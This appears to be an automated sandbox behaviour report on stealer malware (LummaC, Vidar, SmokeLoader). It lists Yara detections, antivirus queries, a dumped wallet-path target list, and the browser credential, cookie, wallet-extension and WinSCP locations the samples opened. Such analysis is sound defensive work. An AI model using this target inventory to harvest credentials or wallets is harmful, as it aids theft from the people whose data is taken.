                Source: C:\Users\user\AppData\Local\Temp\38F9.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBDA8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,11_2_6CBDA8DC
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB28390 NSS_GetVersion,11_2_6CB28390
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: 38F9.exe, 00000006.00000003.2154027414.0000000002C75000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2153754688.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000002.2346667476.0000000000609000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2791549428.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2658098297.0000000000953000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2791549428.0000000000949000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected CryptOne packer
                Source: Yara matchFile source: 0000000A.00000002.2305592154.0000000004379000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: 38F9.exe PID: 7932, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Yara detected SmokeLoader
                Source: Yara matchFile source: 00000005.00000002.1969820013.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1740978999.00000000049F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3994237528.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1740710634.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3994385384.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1969780302.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Yara detected Vidar
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Yara detected Vidar stealer
                Source: Yara matchFile source: 10.2.D818.exe.4570000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.D818.exe.2560000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.D818.exe.4347719.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.D818.exe.2560000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.D818.exe.4347719.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.D818.exe.4570000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2305592154.0000000004270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2306037473.0000000004570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2305075541.0000000002560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: D818.exe PID: 7224, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: katB4C0.tmp PID: 4480, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: 38F9.exe, 00000006.00000002.2346667476.0000000000649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: nnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: 38F9.exe, 00000006.00000002.2346667476.0000000000649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: 38F9.exe, 00000006.00000002.2346667476.0000000000649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                Source: 38F9.exe, 00000006.00000002.2346667476.0000000000649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: info.seco
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: nnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: nnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: 38F9.exe, 00000006.00000002.2346667476.0000000000649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                Source: 38F9.exe, 00000006.00000002.2346667476.0000000000649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: 38F9.exe, 00000006.00000002.2346667476.0000000000649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: MultiDoge
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: seed.seco
                Source: 38F9.exe, 00000006.00000002.2346667476.0000000000649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                Opens network shares
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: \\config\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: \\config\Jump to behavior
                Tries to harvest and steal Bitcoin Wallet information
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
